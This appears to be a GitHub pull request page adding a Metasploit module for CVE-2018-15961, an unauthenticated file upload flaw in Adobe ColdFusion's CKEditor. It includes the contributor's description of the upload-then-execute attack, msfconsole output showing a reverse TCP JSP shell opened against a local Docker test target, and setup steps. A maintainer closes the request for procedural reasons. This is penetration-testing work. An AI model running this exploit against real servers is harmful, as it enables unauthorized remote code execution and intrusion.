New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add CVE-2018-15961 Adobe ColdFusion CKEditor unrestricted file upload #11201

Closed
wants to merge 2 commits into
base: master
from

Conversation

Projects
None yet
3 participants
@Qazeer
Copy link
Contributor

Qazeer commented Jan 6, 2019

Hello everyone,

This module exploit the unrestricted file upload flaw in the Adobe ColdFusion CKEditor, affecting ColdFusion 11 (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and ColdFusion 2018 (July 12 release). The vulnerabilty goes by CVE-2018-15961.

The exploitation is pretty basic, a JSP payload is uploaded through a single unauthenticated POST request and executed through a following unauthenticated GET request.

This module was successfully tested against a Linux Adobe ColdFusion 2018 installation using the docker container provided by Adobe (https://bintray.com/eaps/coldfusion/cf%3Acoldfusion/2018.0.0).

Output

msf > use exploit/multi/http/coldfusion_ckeditor_file_upload
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set RPORT 8500
RPORT => 8500
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > run

[] Started reverse TCP handler on 172.17.0.1:4444
[
] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/LKDZNMPN.jsp...
[+] Upload succeeded! Executing payload...
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:38568) at 2019-01-06 05:07:54 +0100

whoami
cfuser

Verification

msfconsole
use exploit/multi/http/coldfusion_ckeditor_file_upload set srvhost
set RHOST
set RPORT
// If necessary
set payload
set LHOST
set LPORT
run

TODO

Should be working on Windows and Adobe 2016 as the URL used do not change but not tested.

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Jan 6, 2019

Hi @Qazeer

It is required that code in your fork be merged from a unique branch in your repository to master in Rapid7's. Please create a new branch in your fork of framework and resubmit this from that branch.

git checkout -b <BRANCH_NAME>
git push <your_fork_remote> <BRANCH_NAME>

This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.

Closing based on the this requirement, please do resubmit from a unique branch.

@bcoles bcoles closed this Jan 6, 2019

@bcoles
Copy link
Contributor

bcoles left a comment

Please use spaces instead of tabs for indentation

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Jan 6, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment